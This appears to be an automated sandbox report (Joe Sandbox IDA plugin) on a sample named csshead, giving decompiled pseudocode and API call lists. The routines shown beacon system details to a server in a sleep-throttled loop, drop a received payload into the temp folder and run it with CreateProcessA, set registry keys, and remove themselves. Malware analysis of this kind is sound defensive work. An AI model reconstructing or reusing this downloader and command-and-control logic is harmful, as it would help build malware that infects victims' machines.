    						_t94 =  *(E00402430( *((intOrPtr*)( *((intOrPtr*)(_t97 + 0x14)) + _t71 * 4))));
    						if( *(_t94 - 0xc) < 0) {
    							_t57 =  *0x440024; // 0x44001c
    							 *(_t98 + 0x14) = _t57;
    							__eflags = _t94;
    							if(_t94 != 0) {
    								_t92 = lstrlenA(_t94);
    							} else {
    								_t92 = 0;
    							}
    							_t59 = E00401BA0(_t98 + 0x18, _t92);
    							__eflags = _t59;
    							if(_t59 == 0) {
    								_t94 =  *(_t98 + 0x14);
    								goto L14;
    							} else {
    								_t94 =  *(_t98 + 0x1c);
    								_t13 = _t92 + 1; // 0x1
    								_t80 = _t13;
    								_t68 = L00422399(_t94, _t80, _t94, _t92);
    								_t98 = _t98 + 0x10;
    								__eflags = _t68 - 0x50;
    								if(_t68 > 0x50) {
    									L29:
    									L00401230(0x80004005);
    									goto L30;
    								} else {
    									_t14 = _t68 + 0x42130c; // 0x3030300
    									switch( *((intOrPtr*)(( *_t14 & 0x000000ff) * 4 +  &M004212FC))) {
    										case 0:
    											 *((intOrPtr*)(_t94 - 8)) = _t92;
    											 *((char*)(_t92 + _t94)) = 0;
    											goto L14;
    										case 1:
    											L00401230(0x8007000e);
    											goto L28;
    										case 2:
    											L28:
    											L00401230(0x80070057);
    											goto L29;
    										case 3:
    											goto L29;
    									}
    								}
    							}
    						} else {
    							InterlockedIncrement(_t94 - 0xc);
    							L14:
    							_t61 = L00424BC1(_t94,  *(_t98 + 0x20));
    							_t98 = _t98 + 8;
    							_t80 = _t94 - 0xc;
    							if(_t61 == 0) {
    								L30:
    								 *((intOrPtr*)( *((intOrPtr*)(_t98 + 0x24)))) =  *((intOrPtr*)(_t98 + 0x18));
    								__eflags = _t80 -  *0x440020; // 0x440010
    								if(__eflags != 0) {
    									_t95 =  &(_t94[0xfffffffffffffff4]);
    									_t64 = InterlockedDecrement(_t95);
    									__eflags = _t64;
    									if(_t64 <= 0) {
    										_push(_t95);
    										L004221B4();
    									}
    								}
    								return 5;
    							} else {
    								_t107 = _t80 -  *0x440020; // 0x440010
    								if(_t107 != 0) {
    									_t96 =  &(_t94[0xfffffffffffffff4]);
    									if(InterlockedDecrement(_t96) <= 0) {
    										_push(_t96);
    										L004221B4();
    										_t98 = _t98 + 4;
    									}
    								}
    								_t71 = _t71 + 1;
    								if(_t71 <  *((intOrPtr*)(_t97 + 0x18))) {
    									continue;
    								} else {
    									goto L19;
    								}
    							}
    						}
    						goto L40;
    					}
    					RaiseException(0xc000008c, 1, 0, 0);
    					L35:
    					_t41 =  *(_t98 + 0x10);
    					L36:
    					__eflags = _t41 - 0xc -  *0x440020; // 0x440010
    					if(__eflags != 0) {
    						_t44 = InterlockedDecrement( &(_t41[0xfffffffffffffff4]));
    						__eflags = _t44;
    						if(_t44 <= 0) {
    							_t84 =  &(( *(_t98 + 0x10))[0xfffffffffffffff4]);
    							__eflags = _t84;
    							_push(_t84);
    							L004221B4();
    						}
    					}
    					return 3;
    				}
    				L40:
    			}
    0x004210d9
    0x004210db
    0x004210de
    0x004210e8
    0x004211c5
    0x004211c5
    0x004211ce
    0x004211d4
    0x004211db
    0x004211e2
    0x00000000
    0x004211e8
    0x004211e8
    0x004211f0
    0x00000000
    0x004211f6
    0x004211fb
    0x00421203
    0x00000000
    0x0042121d
    0x0042121d
    0x00421224
    0x0042122a
    0x00421241
    0x00421242
    0x00421247
    0x00421256
    0x00421256
    0x00421203
    0x004211f0
    0x004210f0
    0x004210f0
    0x00421107
    0x00421110
    0x00421116
    0x00421124
    0x00421129
    0x0042112d
    0x0042112f
    0x0042113c
    0x00421131
    0x00421131
    0x00421131
    0x00421143
    0x00421148
    0x0042114a
    0x0042117f
    0x00000000
    0x0042114c
    0x0042114e
    0x00421152
    0x00421152
    0x00421157
    0x0042115c
    0x0042115f
    0x00421162
    0x0042126d
    0x00421272
    0x00000000
    0x00421168
    0x00421168
    0x0042116f
    0x00000000
    0x00421176
    0x00421179
    0x00000000
    0x00000000
    0x0042125e
    0x00000000
    0x00000000
    0x00421263
    0x00421268
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0042116f
    0x00421162
    0x00421118
    0x0042111c
    0x00421183
    0x00421189
    0x0042118e
    0x00421191
    0x00421196
    0x00421277
    0x0042127f
    0x00421281
    0x00421287
    0x00421289
    0x0042128d
    0x00421293
    0x00421295
    0x00421297
    0x00421298
    0x0042129d
    0x00421295
    0x004212ac
    0x0042119c
    0x0042119c
    0x004211a2
    0x004211a4
    0x004211b0
    0x004211b2
    0x004211b3
    0x004211b8
    0x004211b8
    0x004211b0
    0x004211bb
    0x004211bf
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004211bf
    0x00421196
    0x00000000
    0x00421116
    0x004212ba
    0x004212c0
    0x004212c0
    0x004212c4
    0x004212c7
    0x004212cd
    0x004212d3
    0x004212d9
    0x004212db
    0x004212e1
    0x004212e1
    0x004212e4
    0x004212e5
    0x004212ea
    0x004212db
    0x004212f9
    0x004212f9
    0x00000000

    APIs
    • InterlockedIncrement.KERNEL32(00000000), ref: 0042111C
    • lstrlenA.KERNEL32 ref: 00421136
      • Part of subcall function 00401BA0: InterlockedDecrement.KERNEL32(?), ref: 00401BC8
    • InterlockedDecrement.KERNEL32(?), ref: 004211A8
    • PathFindExtensionA.SHLWAPI(?), ref: 004211FB
    • lstrcmpiA.KERNEL32(00000000,?), ref: 0042120F
    • InterlockedDecrement.KERNEL32(?), ref: 00421230
      • Part of subcall function 00401230: RaiseException.KERNEL32(-C006C020,00000001,00000000,00000000,0040807F,80004005), ref: 0040124C
    • InterlockedDecrement.KERNEL32(?), ref: 0042128D
    • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 004212BA
    • InterlockedDecrement.KERNEL32(?), ref: 004212D3
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    C-Code - Quality: 98%
    			E004084A4() {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				void* _v16;
    				char _v20;
    				intOrPtr* _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				long _v44;
    				intOrPtr _v48;
    				intOrPtr _v52;
    				intOrPtr _v56;
    				intOrPtr _v60;
    				intOrPtr _v64;
    				intOrPtr _v68;
    				char _v156;
    				char _v4253;
    				char _v4382;
    				char _v4424;
    				char _v4428;
    				intOrPtr _t119;
    				intOrPtr _t131;
    				intOrPtr _t135;
    				intOrPtr _t140;
    				intOrPtr _t144;
    				intOrPtr _t149;
    				intOrPtr _t152;
    				intOrPtr _t157;
    				intOrPtr _t165;
    				intOrPtr _t170;
    				intOrPtr _t174;
    				intOrPtr _t179;
    				intOrPtr _t187;
    				void* _t195;
    				intOrPtr _t198;
    				signed int _t199;
    				char _t202;
    				intOrPtr _t205;
    				signed int _t208;
    				intOrPtr _t220;
    				intOrPtr _t228;
    				char _t236;
    				intOrPtr _t269;
    				char _t276;
    				intOrPtr _t279;
    				intOrPtr _t283;
    				intOrPtr _t289;
    				intOrPtr* _t290;
    				intOrPtr _t291;
    				intOrPtr _t292;
    				void* _t300;
    				void* _t301;
    				void* _t317;
    
    				_v68 = _t119;
    				_v40 = E004013DC(0x20000);
    				_v60 = 0;
    				_v64 = 0;
    				_v4382 = 0;
    				if( *0x40b77c == 0) {
    					_t276 =  *0x40c355; // 0x0
    					_v4428 = _t276;
    					E00401308( &_v4424, 0x40c384);
    					while(1) {
    						_t281 =  &_v4428;
    						_t279 =  *0x40a194; // 0x401e9c
    						_v12 = E00405AE8(_t279,  &_v4428, 0);
    						if(_v12 != 0) {
    							goto L4;
    						}
    						Sleep(0x4e20);
    					}
    					while(1) {
    						L4:
    						_v48 = 0;
    						E004064BC( &_v156, 0x32, __eflags);
    						_t283 =  *0x40a198; // 0x401eac
    						E00401308(_v40, _t283);
    						E0040133C(_v40, "1530474054");
    						_t131 =  *0x40a19c; // 0x401eb4
    						E0040133C(_v40, _t131);
    						_t135 =  *0x40b77c; // 0x0
    						E00401864(_t135,  &_v4253);
    						E0040133C(_v40,  &_v4253);
    						_t140 =  *0x40a0bc; // 0x401c84
    						E0040133C(_v40, _t140);
    						_t144 =  *0x40c380; // 0x0
    						E00401864(_t144,  &_v4253);
    						E0040133C(_v40,  &_v4253);
    						_t149 =  *0x40a0c0; // 0x401c8c
    						E0040133C(_v40, _t149);
    						_t152 =  *0x40c37c; // 0x0
    						E00401164(_t152,  &_v4253);
    						E0040133C(_v40,  &_v4253);
    						_t157 =  *0x40a0b4; // 0x401c70
    						E0040133C(_v40, _t157);
    						E00408258( &_v4253);
    						E0040133C(_v40,  &_v4253);
    						_t165 =  *0x40a0b8; // 0x401c78
    						E0040133C(_v40, _t165);
    						E0040133C(_v40, 0x408984);
    						_t170 =  *0x40a0c4; // 0x401c94
    						E0040133C(_v40, _t170);
    						_t174 =  *0x40c355; // 0x0
    						E00401864(_t174,  &_v4253);
    						E0040133C(_v40,  &_v4253);
    						_t317 = _t301 + 0x80;
    						__eflags = _v4382;
    						if(_v4382 != 0) {
    							E0040133C(_v40,  &_v4382);
    							_t317 = _t317 + 8;
    						}
    						_t179 =  *0x40a1bc; // 0x401ef8
    						E0040133C(_v40, _t179);
    						E00404154( &_v4253);
    						E0040133C(_v40,  &_v4253);
    						_t187 =  *0x40a0c8; // 0x401c9c
    						E0040133C(_v40, _t187);
    						_t301 = _t317 + 0x18;
    						_v8 = 0;
    						_v44 = GetTickCount();
    						__eflags = _v44 - 0x3a98;
    						if(_v44 < 0x3a98) {
    							__eflags = 0x3a98;
    							Sleep(0x3a98 - _v44);
    						}
    						_t195 = E004012DC(_v40);
    						_t198 =  *0x40c230; // 0x0
    						_t199 =  *0x40b784; // 0x0
    						_v12 = E00405D20(_t281, _t199 &  *0x40a074, _t198,  &_v156, 0x40b625, 0x40c355, _v40, _t195,  &_v16,  &_v20);
    						__eflags = _v12;
    						if(_v12 == 0) {
    							break;
    						}
    						_t289 =  *0x40a240; // 0x4020a8
    						_v36 = E00401110(_v16, _t289);
    						_v24 = _v16;
    						_t220 =  *0x40c355; // 0x0
    						 *0x40b64d = _t220;
    						 *0x40b780 = E00405468();
    						E00407474(0x40b61c, __eflags);
    						_t290 =  *0x40a1a8; // 0x401ecc
    						__eflags =  *_v24 -  *_t290;
    						if( *_v24 ==  *_t290) {
    							L21:
    							E00401440(_v16);
    							do {
    								_v48 = _v48 + 1;
    								Sleep(0x3e8);
    								_v52 = _v52 + 1;
    								_t228 =  *0x40b715; // 0x0
    								__eflags = _t228 - _v48;
    							} while (__eflags > 0);
    							continue;
    						}
    						_v56 = 0;
    						_v28 = 0;
    						_t291 =  *0x40a190; // 0x401e8c
    						_v28 = E00401110(_v24, _t291);
    						__eflags = _v28;
    						if(_v28 == 0) {
    							_t292 =  *0x40a18c; // 0x401e7c
    							_v28 = E00401110(_v24, _t292);
    						} else {
    							_v56 = 0xffffffff;
    						}
    						__eflags = _v28;
    						if(_v28 != 0) {
    							_v44 = _v28 - _v24;
    							_v28 = _v28 + 0xd;
    							_v36 = E00401110(_v28, E00408988);
    							_v32 = _v36 - _v28;
    							_t281 = _v32;
    							E004012B8( &_v4253, _v32, _v28);
    							 *((char*)(_t300 + _v32 - 0x1099)) = 0;
    							_v32 = E004010E0( &_v4253, _v28);
    							_t269 = _v36 + 2;
    							__eflags = _t269;
    							_v28 = _t269;
    							 *((char*)(_v24 + _v44)) = 0;
    						}
    						__eflags = _v56;
    						if(__eflags == 0) {
    							L19:
    							_t236 = E00407F20(_v24, _t281, 4);
    							__eflags = _t236;
    							if(_t236 != 0) {
    								E004080C0(_v56);
    								E00401440(_v40);
    								E00401440(_v16);
    								_push(0);
    								RtlExitUserThread();
    							}
    							goto L21;
    						} else {
    							_t281 = _v32;
    							__eflags = E004082F8(_v24, _v32, _v28, __eflags);
    							if(__eflags == 0) {
    								E00401440(_v16);
    								continue;
    							}
    							E004080C0(_v56);
    							E00401440(_v40);
    							E00401440(_v16);
    							_push(0);
    							RtlExitUserThread();
    							goto L19;
    						}
    					}
    					_t202 =  *0x40c355; // 0x0
    					_v4428 = _t202;
    					E00401308( &_v4424, 0x40c384);
    					_t205 =  *0x40b651; // 0x0
    					_t208 =  *0x40b784; // 0x0
    					_t281 =  *0x40b780; // 0x0
    					__eflags = E0040660C(_t208 &  *0x40a074, _t281, 0x40b625, __eflags, 0x40ba00,  &_v4428,  &_v4253, _t205);
    					if(__eflags != 0) {
    						E00401308(0x40b625,  &_v4253);
    						E00401308(0x40c254,  &_v4253);
    					}
    					 *0x40c355 = _v4428;
    					 *0x40b64d = _v4428;
    				}
    			}

    APIs
      • Part of subcall function 004013DC: GetProcessHeap.KERNEL32(00000000,?), ref: 004013EB
      • Part of subcall function 004013DC: RtlAllocateHeap.NTDLL(00000000), ref: 004013F2
    • Sleep.KERNEL32(00004E20), ref: 00408519
      • Part of subcall function 004064BC: GetVersionExA.KERNEL32(0000009C), ref: 00406530
      • Part of subcall function 00401864: wsprintfA.USER32 ref: 00401874
      • Part of subcall function 00404154: GetKeyboardLayoutList.USER32(00000009,?), ref: 00404169
    • GetTickCount.KERNEL32 ref: 004086EB
    • Sleep.KERNEL32(00003A98), ref: 00408706
      • Part of subcall function 00405468: GetSystemTime.KERNEL32(?), ref: 00405472
      • Part of subcall function 00407474: RegCreateKeyExA.ADVAPI32(80000002,004021A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 0040750D
      • Part of subcall function 00407474: RegCreateKeyExA.ADVAPI32(80000001,004021A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00407533
    • RtlExitUserThread.NTDLL(00000000), ref: 004088B6
      • Part of subcall function 004082F8: GetTempPathA.KERNEL32(00000201,?), ref: 00408364
      • Part of subcall function 004082F8: Sleep.KERNEL32(000005DC), ref: 004083E3
      • Part of subcall function 004082F8: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0040840C
      • Part of subcall function 004082F8: wsprintfA.USER32 ref: 00408476
    • RtlExitUserThread.NTDLL(00000000), ref: 00408879
      • Part of subcall function 004080C0: RtlRemoveVectoredExceptionHandler.NTDLL(00000000), ref: 004080DB
      • Part of subcall function 004080C0: CreateEventA.KERNEL32(00000000,000000FF,00000000,00000000), ref: 004080E9
      • Part of subcall function 004080C0: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00408106
      • Part of subcall function 004080C0: CloseHandle.KERNEL32(00000000), ref: 00408112
      • Part of subcall function 004080C0: SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 00408184
      • Part of subcall function 004080C0: SHDeleteKeyA.SHLWAPI(80000002,004021A4), ref: 004081BB
      • Part of subcall function 004080C0: SHDeleteKeyA.SHLWAPI(80000001,004021A4), ref: 004081FB
      • Part of subcall function 004080C0: ReleaseMutex.KERNEL32(00000000), ref: 00408221
      • Part of subcall function 004080C0: CloseHandle.KERNEL32(00000000), ref: 0040822D
      • Part of subcall function 004080C0: ExitProcess.KERNEL32 ref: 00408244
      • Part of subcall function 00401440: GetProcessHeap.KERNEL32(00000000,?), ref: 0040144D
      • Part of subcall function 00401440: HeapFree.KERNEL32(00000000), ref: 00401454
      • Part of subcall function 0040660C: Sleep.KERNEL32(000927C0), ref: 004066F5
      • Part of subcall function 0040660C: GetTickCount.KERNEL32 ref: 004066FD
      • Part of subcall function 0040660C: GetTickCount.KERNEL32 ref: 004067AF
      • Part of subcall function 0040660C: Sleep.KERNEL32(00001388), ref: 004067CD
      • Part of subcall function 0040660C: Sleep.KERNEL32(000493E0), ref: 004067F3
      • Part of subcall function 0040660C: Sleep.KERNEL32(000927C0), ref: 0040680F
    • Sleep.KERNEL32(000003E8), ref: 0040895F
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 95%
    			E0040660C(intOrPtr __eax, intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				signed int _v20;
    				signed int _v24;
    				char _v28;
    				char _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				signed int _v44;
    				long _v48;
    				intOrPtr _v52;
    				char _v181;
    				char _v264;
    				char _v329;
    				char _v394;
    				intOrPtr _t116;
    				intOrPtr _t123;
    				signed int _t131;
    				signed int _t151;
    				intOrPtr _t154;
    				signed int _t155;
    				intOrPtr _t175;
    				intOrPtr _t195;
    				void* _t201;
    				void* _t202;
    
    				_v16 = __ecx;
    				_v12 = __edx;
    				_v8 = __eax;
    				_v20 = 0;
    				E004064BC( &_v264, 0x51, __eflags);
    				_v36 = E00401110(_v12, E00406900);
    				_v40 = _v36 - _v12;
    				E004012B8( &_v329, _v40, _v12);
    				 *((char*)(_t201 + _v40 - 0x145)) = 0;
    				E00401308( &_v394,  &_v329);
    				_v44 = 1;
    				L1:
    				while(1) {
    					if(_v44 % 0x32 == 0 || _v44 == 1) {
    						L3:
    						_t184 = _a8;
    						_t116 =  *0x40a194; // 0x401e9c
    						_v24 = E00405AE8(_t116, _a8, 0);
    						if(_v24 == 0) {
    							Sleep(0x927c0);
    							goto L3;
    						}
    						_t123 =  *0x40c230; // 0x0
    						_v24 = E00405D20(_t184, _v8, _t123,  &_v264, _v12, _a8, 0, 0,  &_v28,  &_v32);
    						if(_v24 == 0) {
    							goto L7;
    						} else {
    							E00401440(_v28);
    							_v20 = 0;
    							goto L39;
    						}
    					} else {
    						L7:
    						_v48 = GetTickCount();
    						_t195 =  *0x40c230; // 0x0
    						E00406340( &_v329, 0x94, _t195, __eflags);
    						_v24 = 0;
    						_t131 = E00401110(_a4,  &_v329);
    						__eflags = _t131;
    						if(_t131 == 0) {
    							E00401308( &_v181,  &_v329);
    							E0040133C( &_v181, _v36);
    							_t202 = _t202 + 8;
    							_t175 =  *0x40c230; // 0x0
    							_v24 = E00405D20(0x94, _v8, _t175,  &_v264,  &_v181, _a8, 0, 0,  &_v28,  &_v32);
    						}
    						__eflags = _v24;
    						if(_v24 == 0) {
    							_v48 = GetTickCount() - _v48;
    							__eflags = _v48 - 0x1388;
    							if(_v48 < 0x1388) {
    								__eflags = 0x1388;
    								Sleep(0x1388 - _v48);
    							}
    							_v52 = E00405468();
    							__eflags = _v44 - 5;
    							if(_v44 != 5) {
    								L19:
    								__eflags = _v52 - _v16 - 0x3f480;
    								if(_v52 - _v16 >= 0x3f480) {
    									__eflags = _v52 - _v16 - 0x3f480;
    									if(_v52 - _v16 <= 0x3f480) {
    										L28:
    										__eflags = _v52 - _v16 - 0x7e900;
    										if(_v52 - _v16 <= 0x7e900) {
    											L33:
    											__eflags = _v52 - _v16 - 0xd2f00;
    											if(_v52 - _v16 > 0xd2f00) {
    												__eflags = _v44 - 0x12c;
    												if(_v44 != 0x12c) {
    													_t95 =  &_v44;
    													 *_t95 = _v44 + 1;
    													__eflags =  *_t95;
    												} else {
    													_v44 = 1;
    												}
    											}
    											L37:
    											__eflags = _v44 - 1;
    											if(__eflags == 0) {
    												E00401308( &_v329,  &_v394);
    											}
    											continue;
    										}
    										__eflags = _v52 - _v16 - 0xd2f00;
    										if(_v52 - _v16 >= 0xd2f00) {
    											goto L33;
    										}
    										__eflags = _v44 - 0xc8;
    										if(_v44 != 0xc8) {
    											_v44 = _v44 + 1;
    										} else {
    											_v44 = 1;
    										}
    										goto L37;
    									}
    									__eflags = _v52 - _v16 - 0x7e900;
    									if(_v52 - _v16 >= 0x7e900) {
    										goto L28;
    									}
    									__eflags = _v44 - 0x64;
    									if(_v44 != 0x64) {
    										_v44 = _v44 + 1;
    									} else {
    										_v44 = 1;
    									}
    									goto L37;
    								}
    								__eflags = _v44 - 0x32;
    								if(_v44 != 0x32) {
    									_v44 = _v44 + 1;
    								} else {
    									_v44 = 1;
    								}
    								goto L37;
    							} else {
    								__eflags = _v52 - _a16 - 0x927c0;
    								if(_v52 - _a16 >= 0x927c0) {
    									goto L19;
    								}
    								Sleep(0x493e0);
    								_t151 = E00405620();
    								asm("sbb eax, eax");
    								__eflags =  ~( ~_t151);
    								if( ~( ~_t151) == 0) {
    									while(1) {
    										_t154 =  *0x40a194; // 0x401e9c
    										_t155 = E00405AE8(_t154, _a8, 0);
    										asm("sbb eax, eax");
    										__eflags =  ~( ~_t155);
    										if( ~( ~_t155) != 0) {
    											goto L19;
    										}
    										Sleep(0x927c0);
    									}
    								}
    								goto L19;
    							}
    						} else {
    							E00401308(_a12,  &_v181);
    							E00401440(_v28);
    							_v20 = 0xffffffff;
    							L39:
    							return _v20;
    						}
    					}
    				}
    			}

    APIs
      • Part of subcall function 004064BC: GetVersionExA.KERNEL32(0000009C), ref: 00406530
    • Sleep.KERNEL32(000927C0), ref: 004066F5
    • GetTickCount.KERNEL32 ref: 004066FD
      • Part of subcall function 00401440: GetProcessHeap.KERNEL32(00000000,?), ref: 0040144D
      • Part of subcall function 00401440: HeapFree.KERNEL32(00000000), ref: 00401454
    • GetTickCount.KERNEL32 ref: 004067AF
    • Sleep.KERNEL32(00001388), ref: 004067CD
      • Part of subcall function 00405468: GetSystemTime.KERNEL32(?), ref: 00405472
    • Sleep.KERNEL32(000493E0), ref: 004067F3
    • Sleep.KERNEL32(000927C0), ref: 0040680F
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
    • GetModuleFileNameW.KERNEL32(00000000,00442CAA,00000104,00000001,?,00000000), ref: 00426404
      • Part of subcall function 00425114: GetCurrentProcess.KERNEL32 ref: 0042512A
      • Part of subcall function 00425114: TerminateProcess.KERNEL32(00000000), ref: 00425131
    • _wcslen.LIBCMT ref: 00426433
    • _wcslen.LIBCMT ref: 00426440
      • Part of subcall function 0042E40B: LoadLibraryW.KERNEL32(0043A37C,00442C78,00000314,00000000), ref: 0042E446
    • GetStdHandle.KERNEL32(000000F4,00000001,?,00000000), ref: 004264B6
    • _strlen.LIBCMT ref: 004264F3
    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00426502
      • Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
      • Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
      • Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(0043A498), ref: 0042FB16
      • Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
      • Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • SelectObject.GDI32(00000000,00000000), ref: 004147C8
    • PatBlt.GDI32(00000000,00000000,00000000,?,?,00FF0062), ref: 004147EA
    • GetSysColor.USER32(00000012), ref: 004147F2
      • Part of subcall function 00412B40: DeleteDC.GDI32(00000000), ref: 00412B8A
      • Part of subcall function 00412B40: SetBkColor.GDI32(00000000,00808080), ref: 00412CF7
      • Part of subcall function 00412B40: DeleteObject.GDI32(?), ref: 00412D77
      • Part of subcall function 00412B40: DeleteObject.GDI32(?), ref: 00412D89
      • Part of subcall function 00412B40: DeleteDC.GDI32(?), ref: 00412D9B
      • Part of subcall function 00412B40: DeleteDC.GDI32(00000000), ref: 00412DA6
      • Part of subcall function 00412B40: FillRect.USER32(?,?,?), ref: 00412DE0
      • Part of subcall function 00412B40: DeleteDC.GDI32(?), ref: 00412E82
      • Part of subcall function 00412B40: DeleteObject.GDI32(?), ref: 00412E8D
      • Part of subcall function 00412B40: DeleteDC.GDI32(?), ref: 00412E94
    • SelectObject.GDI32(00000000,?), ref: 0041485A
    • DeleteObject.GDI32(00000000), ref: 00414865
    • DeleteDC.GDI32(00000000), ref: 00414872
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • RtlEnterCriticalSection.NTDLL ref: 0041991C
    • GetCurrentThreadId.KERNEL32 ref: 00419922
    • RtlLeaveCriticalSection.NTDLL(00442A20), ref: 00419942
    • InterlockedIncrement.KERNEL32(00442AE0), ref: 004199D7
    • ShowWindow.USER32(?,?), ref: 004199EA
      • Part of subcall function 00410190: IsWindow.USER32(?), ref: 0041019A
      • Part of subcall function 00410190: GetWindowLongA.USER32(?,000000FC), ref: 004101B4
      • Part of subcall function 00410190: SetWindowLongA.USER32(?,000000FC,?), ref: 004101CF
      • Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
      • Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 100%
    			E004082F8(intOrPtr __eax, intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				char _v541;
    				char _v1054;
    				struct _STARTUPINFOA _v1124;
    				struct _PROCESS_INFORMATION _v1140;
    				intOrPtr _t41;
    				intOrPtr _t57;
    				intOrPtr _t62;
    				intOrPtr _t66;
    				intOrPtr _t77;
    
    				_v16 = __ecx;
    				_v12 = __edx;
    				_v8 = __eax;
    				_v20 = 0;
    				_v24 = E00407CFC(_v12);
    				E00401258( &_v1124, 0x44);
    				_v1124.cb = 0x44;
    				if(_v24 == 0) {
    					_t41 =  *0x40a168; // 0x401dec
    					E00407290(_t41);
    				} else {
    					_v28 = E00401110(_v8, 0x408494);
    					_t96 = _v28;
    					if(_v28 != 0) {
    						GetTempPathA(0x201,  &_v1054);
    						E00407560( &_v1054, 0x408494, _t96);
    						E00401308( &_v541, 0x40849c);
    						E0040133C( &_v541,  &_v1054);
    						E0040133C( &_v541, 0x40849c);
    						_t57 =  *0x40a0a8; // 0x401c4c
    						E0040133C( &_v541, _t57);
    						if( *((char*)(_v28 + 4)) != 0x31) {
    							 *0x40b514 = 0;
    							_t62 =  *0x40b510; // 0x0
    							E00401828(_t62);
    							E004013B4(0x40b510, _v16);
    							_t66 =  *0x40b510; // 0x0
    							E004012B8(_t66, _v16, _v12);
    							 *0x40b514 = _v16;
    							 *0x40be1c = 0;
    							wsprintfA("1530474054", 0x4084a0, _v24);
    						} else {
    							E0040485C( &_v1054, _v16, _v12);
    							Sleep(0x5dc);
    							if(CreateProcessA(0,  &_v541, 0, 0, 0, 0, 0, 0,  &_v1124,  &_v1140) == 0) {
    								_t77 =  *0x40a174; // 0x401e10
    								E00407290(_t77);
    							} else {
    								_v20 = 0xffffffff;
    							}
    						}
    					}
    				}
    				return _v20;
    			}

    APIs
    • GetTempPathA.KERNEL32(00000201,?), ref: 00408364
    • Sleep.KERNEL32(000005DC), ref: 004083E3
    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0040840C
      • Part of subcall function 00401828: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00406A2F), ref: 0040183A
      • Part of subcall function 004013B4: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 004013CD
    • wsprintfA.USER32 ref: 00408476
      • Part of subcall function 0040485C: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00404886
      • Part of subcall function 0040485C: WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 004048A7
      • Part of subcall function 0040485C: FlushFileBuffers.KERNEL32(000000FF), ref: 004048C4
      • Part of subcall function 0040485C: CloseHandle.KERNEL32(000000FF), ref: 004048CE
      • Part of subcall function 00407290: CreateThread.KERNEL32(00000000,00000000,Function_00007278,?,00000000,?), ref: 004072AC
      • Part of subcall function 00407290: CloseHandle.KERNEL32(?), ref: 004072B9
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
